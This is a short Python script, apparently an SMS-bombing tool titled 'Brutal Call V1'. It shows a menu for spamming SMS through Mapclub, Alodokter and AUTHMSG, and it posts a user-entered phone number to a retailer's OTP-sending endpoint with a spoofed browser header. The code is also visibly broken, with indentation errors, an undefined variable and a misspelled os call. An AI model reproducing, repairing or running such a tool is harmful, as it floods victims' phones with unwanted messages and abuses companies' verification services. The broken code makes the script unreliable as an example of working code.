
import os,sys,time,re,requests,json
from requests import post
from time import sleep
def intro(s):
    for c in s + "\n":
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(1./100)
def intro2(s):
    for c in s + "\n":
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(1./100)
def intro3(s):
    for c in s + "\n":
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(1./100)
def marco():
    ua={
    "Host": "www.idmarco.com",
    "accept": "*/*",
    "x-requested-with": "XMLHttpRequest",
    "user-agent": "Mozilla/5.0 (Linux; Android 10; SM-A107F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Mobile Safari/537.36"
    }
    d={"phone":no}
    r = requests.post("https://www.idmarco.com/smsotp/login/sendotp/", data=d, headers=ua)
    sys.exit()
def map():
	no = input("\033[1;37m{\033[1;33m•\033[1;37m} >\033[1;33m number : \033[1;96m")
        marco()
s.system('clear')      
intro("""\033[1;96m╔╗ \033[1;37m┬─┐┬ ┬┌┬┐┌─┐┬    \033[1;96m╔═╗\033[1;37m┌─┐┬  ┬
\033[1;96m╠╩╗\033[1;37m├┬┘│ │ │ ├─┤│    \033[1;96m║  \033[1;37m├─┤│  │
\033[1;96m╚═╝\033[1;37m┴└─└─┘ ┴ ┴ ┴┴─┘  \033[1;96m╚═╝\033[1;37m┴ ┴┴─┘┴─┘\033[1;33mV1""")
intro2("""\033[1;96m═══════════════════════════════════
\033[1;37m{\033[1;33m•\033[1;37m} \033[1;33mAuthor  :  \033[1;96mB4N9C4N
\033[1;37m{\033[1;33m•\033[1;37m} \033[1;33mYoutube :  \033[1;96mCANDRA - NM
\033[1;37m{\033[1;33m•\033[1;37m} \033[1;33mGithub  :  \033[1;96mgithub.com/B4N9C4N
\033[1;96m═══════════════════════════════════""")
time.sleep(1)
intro3("""\033[1;37m{\033[1;33m01\033[1;37m} > \033[1;33mSpam Sms Mapclup
\033[1;37m{\033[1;33m02\033[1;37m} > \033[1;33mSpam Sms Alodokter
\033[1;37m{\033[1;33m03\033[1;37m} > \033[1;33mSpam Sms AUTHMSG
\033[1;37m{\033[1;33m00\033[1;37m} > \033[1;33mExit
\033[1;96m═══════════════════════════════════""")        
intro()
intro2()
intro3()
nomor = input("\033[1;37m{\033[1;33m•\033[1;37m} >\033[1;33m Choice : \033[1;96m")
if nomor == "01":
map()
